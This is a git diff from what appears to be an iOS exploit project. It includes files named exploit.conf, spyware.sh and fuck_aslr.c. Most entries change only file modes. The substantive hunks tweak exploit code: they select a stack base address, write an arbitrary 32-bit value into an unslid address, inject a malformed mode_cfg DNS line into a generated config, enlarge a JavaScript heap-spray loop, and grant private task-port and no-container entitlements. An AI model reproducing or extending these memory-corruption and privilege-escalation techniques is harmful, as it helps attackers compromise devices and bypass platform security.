22 files changed, 22 insertions, 19 deletions

diff --git a/build.sh b/build.sh
index 3bd3809..3bd3809 100755..100644
--- a/build.sh
+++ b/build.sh
diff --git a/build_native.sh b/build_native.sh
index 12ec3b9..12ec3b9 100755..100644
--- a/build_native.sh
+++ b/build_native.sh
diff --git a/exploit.conf b/exploit.conf
index 8bf3bf1..8bf3bf1 100755..100644
--- a/exploit.conf
+++ b/exploit.conf
diff --git a/install.sh b/install.sh
index 3dcfb9c..3dcfb9c 100755..100644
--- a/install.sh
+++ b/install.sh
diff --git a/install_native.sh b/install_native.sh
index 325515a..325515a 100755..100644
--- a/install_native.sh
+++ b/install_native.sh
diff --git a/js/main.js b/js/main.js
index b75af4e..7f1e78e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -69,7 +69,7 @@ function main() {
 //		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
 //		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
 		calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
-		calls4arg("sleep", 1, 0, 0, 0);
+//		calls4arg("sleep", 1, 0, 0, 0);
 		i++;
 //		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
 	}
diff --git a/spyware.sh b/spyware.sh
index dac5939..dac5939 100755..100644
--- a/spyware.sh
+++ b/spyware.sh
diff --git a/src/common.h b/src/common.h
index 9550400..9550400 100755..100644
--- a/src/common.h
+++ b/src/common.h
diff --git a/src/ip_tools.c b/src/ip_tools.c
index 6e36b64..6e36b64 100755..100644
--- a/src/ip_tools.c
+++ b/src/ip_tools.c
diff --git a/src/ip_tools.h b/src/ip_tools.h
index a011094..a011094 100755..100644
--- a/src/ip_tools.h
+++ b/src/ip_tools.h
diff --git a/src/main.c b/src/main.c
index 124affa..3c8d513 100644
--- a/src/main.c
+++ b/src/main.c
@@ -202,11 +202,11 @@ int main(int   argc,
 	fprintf(fp, "#   - with love from spv <3\n");
 	fprintf(fp, "\n");
 
-//	uint32_t	stack_base					= 0x1c7738; // my shell setup
+	uint32_t	stack_base					= 0x1c7738; // my shell setup
 //	uint32_t	stack_base					= 0x1c7c88; // my 4s shell setup
 //	uint32_t	stack_base					= 0x1c2e48; // my lldb
 //	uint32_t	stack_base					= 0x1c7d68; // btserver env
-	uint32_t	stack_base					= 0x1c7dd8; // wifiFirmwareLoader env
+//	uint32_t	stack_base					= 0x1c7dd8; // wifiFirmwareLoader env
 	uint32_t	magic_trigger_addr			= 0xb6074;
 
 	uint32_t	mov_r0_0_bx_lr				= 0x8d3e	| 1;
@@ -286,6 +286,9 @@ int main(int   argc,
 						   0x42424242));
 #endif
 
+	fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141));
+	fprintf(fp, "mode_cfg{dns41.1.1.1;}");
+
 #if 0
 //	fprintf(fp,
 //			"%s\n",
@@ -334,7 +337,7 @@ int main(int   argc,
 							"var parent = new Uint8Array(0x100);"
 							"var child = new Uint8Array(0x100);"
 							"    var fuck = new Array();"
-							"    for (var i = 0; i < 0x10000; i++) {"
+							"    for (var i = 0; i < 0x200000; i++) {"
 							"        fuck[i] = i;"
 							"    }"
 							"    delete fuck;"
@@ -343,7 +346,7 @@ int main(int   argc,
 							strlen("var parent = new Uint8Array(0x100);"
 								   "var child = new Uint8Array(0x100);"
 								   "    var fuck = new Array();"
-								   "    for (var i = 0; i < 0x10000; i++) {"
+								   "    for (var i = 0; i < 0x200000; i++) {"
 								   "        fuck[i] = i;"
 								   "    }"
 								   "    delete fuck;"
diff --git a/src/patchfinder.h b/src/patchfinder.h
index 21af7e3..21af7e3 100755..100644
--- a/src/patchfinder.h
+++ b/src/patchfinder.h
diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c
index b54cb1a..b54cb1a 100755..100644
--- a/src/stage0_primitives.c
+++ b/src/stage0_primitives.c
diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h
index a9a71eb..a9a71eb 100755..100644
--- a/src/stage0_primitives.h
+++ b/src/stage0_primitives.h
diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c
index ffe7b53..ffe7b53 100755..100644
--- a/src/stage1_primitives.c
+++ b/src/stage1_primitives.c
diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h
index d6b9c33..d6b9c33 100755..100644
--- a/src/stage1_primitives.h
+++ b/src/stage1_primitives.h
diff --git a/tools/build.sh b/tools/build.sh
index 5baab83..5baab83 100755..100644
--- a/tools/build.sh
+++ b/tools/build.sh
diff --git a/tools/ent.xml b/tools/ent.xml
index 35801e8..2973d1d 100755..100644
--- a/tools/ent.xml
+++ b/tools/ent.xml
@@ -1,15 +1,15 @@
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

-<plist version="1.0"> 

-<dict> 

-	<key>platform-application</key> 

-	<true/> 

-	<key>com.apple.private.security.no-container</key> 

-	<true/> 

-	<key>com.apple.system-task-ports</key> 

-	<true/> 

-	<key>task_for_pid-allow</key> 

-	<true/> 

-	<key>get-task-allow</key> 

-	<true/>

-</dict>

+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0"> 
+<dict> 
+	<key>platform-application</key> 
+	<true/> 
+	<key>com.apple.private.security.no-container</key> 
+	<true/> 
+	<key>com.apple.system-task-ports</key> 
+	<true/> 
+	<key>task_for_pid-allow</key> 
+	<true/> 
+	<key>get-task-allow</key> 
+	<true/>
+</dict>
 </plist>
\ No newline at end of file
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
index c8e9714..c8e9714 100755..100644
--- a/tools/fuck_aslr.c
+++ b/tools/fuck_aslr.c
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
index 25eab56..25eab56 100755..100644
--- a/tools/fuck_ptr.c
+++ b/tools/fuck_ptr.c
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
index d955ea1..d955ea1 100755..100644
--- a/tools/jit_all_the_things.c
+++ b/tools/jit_all_the_things.c
diff --git a/tools/test.c b/tools/test.c
index 6682971..6682971 100755..100644
--- a/tools/test.c
+++ b/tools/test.c